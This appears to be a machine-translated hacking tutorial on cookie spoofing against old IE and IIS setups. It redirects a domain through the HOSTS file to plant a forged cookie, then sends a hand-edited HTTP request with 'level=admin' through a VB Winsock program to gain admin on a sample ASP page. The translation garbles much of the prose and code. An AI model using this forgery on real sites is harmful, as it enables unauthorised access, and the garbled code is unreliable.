----- Generate a cookie file and change it
Oh, I have long thought about the Dongdong of Cookie, mainly, there are many articles on the Internet to say that it is actually
There is no substantial thing.
First of all, I understand what is cookie. If you are 98, then they are stored by C: / Windows / cookies.
In the directory, if it is 2K, they are in the c: / documents and settings /% of your username% / cookies directory (no more than 4KB per file)
Their filename format is: your username @ generated cookie web file web files in the web directory [Cookie change] .txt
Specific example: iWam_system @ cookie [3] .txt
Let's take a look at a simple cookie file:
Level
admin
Www.locking.8u8.com/cookie/
0
1331699712
29536653
4044081984
29528196
*
The first two paragraphs generated by the server, the third paragraph of the server, and the domain name and web directory of the website of the cookie file.
I have to pay attention to the file name that does not record the creation of the cookie file! So the cookie generated by different files in the same directory is the same file is only every
The numbers in the middle brackets that generate a cookie file name are to add 1, and those behind them, I don't understand it :)
Let's take a look at how to generate a cookie. I take VBS CRIPT as an example:
Document.cookie = "Level" & "=" & "user" & "; expires = monDay, 01-jan-03 12:00:00 GMT"
Msgbox Document.cookie
Here, our special person pays attention to the last paragraph "; Expires = Monday, 01-JAN-03 12:00:00 GMT" This is used to explain the created cookie file
If you don't have this cookie, you will not find it in the directory you said in this article. The effective time in this example is 2003 of course you.
You can also find them on your local hard drive.
In addition, when using Document.cookie to get cookie content, set the cookie effective time this paragraph will be ignored (of course this also convenient for the website cookie
* Decoction) For example, a dialog box that will pop up on Level = User
Ok, let's come in active:
My website is called www.locking.8u8.com There are two files in its cookie directory. One is admin1.htm content is the example above.
There is also a file called Level1.htm as follows:
CO = Document.cookie
Le = MID (CO, INSTR (CO, "=") 1, LEN (CO) -instr (Co, "=") 1)
If le = "user" then
MSGBOX "you are a user"
Else
if le = "admin" then
Msgbox "you are a administrator"
Else
Msgbox "You Not Login"
END IF
END IF
When you first browse admin1.htm, browse Level1.htm and then browse the contents of the dialog as: "You are a user", when you don't have browsed admin1.htm, browse Level1.htm directly "You Not Login" (Note that some people may browse admin1.htm first on the hard disk
Change the content of the cookie of course is not possible)
Ok, our goal is to let us say "you are a administrator" :) when browsing the Level1
There are only two ways: 1) Put 8u8 black, then find that Level1.htm change, you can't make this article not to discuss
2) Perform cookie spoofing, ok let go :)
----------------------------------- (my system environment is 2Kserver IIS5)
Step 1: Self-made a file name called admin2.htm content
Document.cookie = "Level" & "=" & "admin" & "; expires = monDay, 01-jan-03 12:00:00 GMT"
Then put it in a browse directory called cookie (cookie is located in the root directory)
Step 2: Find the HOSTS file in C: / Winnt / System32 / Drivers / etc Added in its back plus the following paragraph:
127.0.0.1
Www.locking.8u8.com
Step 3: Ask www.locking.8u8.com/cookie/admin2.htm (here, this is actually asked by this unit)
Step 4: Delete the content we added in Hosts and then clear the history of IE
Step 5: Let us follow www.locking.8u8.com/cookie/level1.htm
How are we now is administrator (note that the website is necessary to add three W) in front.
In the previous section, the example I have lifted is a very long cookie, for this
Cookie He will generate on our local disk, and it is invalid for those close browsers.
How do we do to deceive fake?
First we should know that in the first quarter of the example, "you are a administrator"
The web page of the frame (Level1.htm is actually downloaded in my locally, that is,
His test reads for cookie is also in local, if is it on the remote server? such as
A ASP program How do he read our cookie?
Let's take a look at the basic stuff: When we use the HTTP protocol to send a remote host
Get or POST request, then if there is this domain's cookie exists (whether in memory
Still this site) will be sent to the server along with the request.
The following is an actual example:
Get /Ring/admin.asp http / 1.1
Accept: * / *
Accept-language: zh-cn
Accept-encoding: Gzip, deflate
User-agent: mozilla / 4.0 (compatible; msie 6.0; windows 98)
Host: 61.139.xx.xx
Connection: Keep-alive
Cookie: level = user; aspsessionidsstcracts = odmlkjmcocjmnjiedfleLacm See the last line :)
Then let's take a look at how the server is tested by cookie, I got a simple example:
There are two ASP files called admin.asp, and there is a named Level.asp.
----------- Admin.asp ------------------
<% response.write now ()%>
<% response.write "
"%>
<% response.cookies ("level") = "user"%>
<% response.write " Document.write (Document.cookie); "%>
----------- Cut here -------------------
----------- Level.asp ------------------
<%
If Request.cookies ("Level") <> ""
Response.write " Document.write (Document.cookie); "
If Request.cookies ("Level") = "user" then
Response.write " Alert ('you are a user'); "
Else
If Request.Cookies ("Level") = "admin" then
Response.write " Alert ('you are administrator!'); "
Set fso1 = server.createObject ("s cripting.filesystemObject")
Set fil = fso1.opentextfile ("d: /sms/ring/a.txt", 8, true)
Fil.WriteLine "you are admin!"
END IF
END IF
Else
Response.write " Alert ('you are not login'); "
END IF
%>
----------- Cut here -------------------
Description: When you ask admin.asp, a temporary cookie will be generated (you will fail), then we don't close your browser.
When requested by Level.asp, it will use Request.Cookies to extract the cookies you sent inside, if your cookies are
If admin, it will use the FSO object to generate a record file in the server (A.TXT should be noted that we have to set the directory to write when we experiment)
Ok, let's introduce so much, our purpose is to let the server generate A.TXT and write content "you are admin" or on the previous section.
Domain name deception? Not let us write a Winsocket program, Let g)
Below is a simple example of our VB WinsCokeT control:
------------------------------------------------- ----------------
Private submmand1_click ()
Winsock1.remoteport = text3.text 'The port opened by the remote host is generally 80
Winsock1.remotehost = text2.text 'Domain names for remote hosts can also lose IP
Winsock1.connect 'Open a socket connection
Command1.enabled = false 'can only open a connection at a time, so let the send button fail
End Sub
Private suwinsock1_connect ()
Winsock1.senddata text1.text 'When the connection is successful, send data.
End Sub
Private sub fascist2_click ()
Winsock1.close
Command1.enabled = true 'Close the connection, let the send button valid
End Sub
Private Sub Winsock1_DataArrival (Byval Bytestotal As Long "receives data, let us check if the data is successful
DIM TMPSTR AS STRING
Winsock1.GetData Tmpstr
TEXT4.TEXT = Tmpstr
End Sub
----------------------- Cut here ------------------------- -------------------
Ok, let's take a look at the specific process: I have to use a nice program Winsock Expert v0.3 beta 1
Step: Open a IE and open Winsock Expert to monitor the packet of the IE window that has just opened
Step 2: In IE address bar
Http://61.139.xx.xx/ring/admin.asp, that I will see the following data
Get /Ring/admin.asp http / 1.1
Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, application / vnd.ms-powerpoint, application / vnd.ms-excel, application / msword, * / *
Accept-language: zh-cn
Accept-encoding: Gzip, deflate
User-agent: mozilla / 4.0 (compatible; msie 6.0; windows 98)
Host: 61.139.xx.xx
Connection: Keep-alive
Don't be half closed, please
Http://61.139.xx.xx/ring/level.asp, we will see the following data
Get /ring/level.asp http / 1.1
Accept: * / *
Accept-language: zh-cn
Accept-encoding: Gzip, deflate
User-agent: mozilla / 4.0 (compatible; msie 6.0; windows 98)
Host: 61.139.xx.xx
Connection: Keep-alive
Cookie: level = user; aspsessionidsstcracts = odmlkjmcocjmnjiedfeLaCM
Three steps: Good to the last line of the data issued for the second time: level = user; aspsessionidsstcracts = odmlkjmcocjmnjiedfleLACM is the Dongdong we have to change, due to the corresponding cookie in Level.asp, IF Request.cookies (" Level ") =" admin "Then
So we only change the last line of the above data to cookie: level = admin; asspsessionidsstcractcs = odmlkjmcocjmnjiedfleLACM
Yes, the back of the stuff is very important to explain it again :)
Four steps: Put the changed data to the send box of my compiled program into the port and domain name. . . . .
Five steps: Go to the server to see if it produces the content inside that A.txt as "you are admin!
It's not written, mainly, I have experienced a lot of experiments, I can completely openly open the program code of this article.
1.Admin.asp and level.asp:
http://locking.8u8.com/cookie/admin.txt and level.txt
2.CookieClient.exe and source code:
http://locking.8u8.com/cookie/cookiesend.zip
3.winsock Expert:
http://software.tom.com/download.asp?id=7500 or
http://dxqsoft.myrice.com/
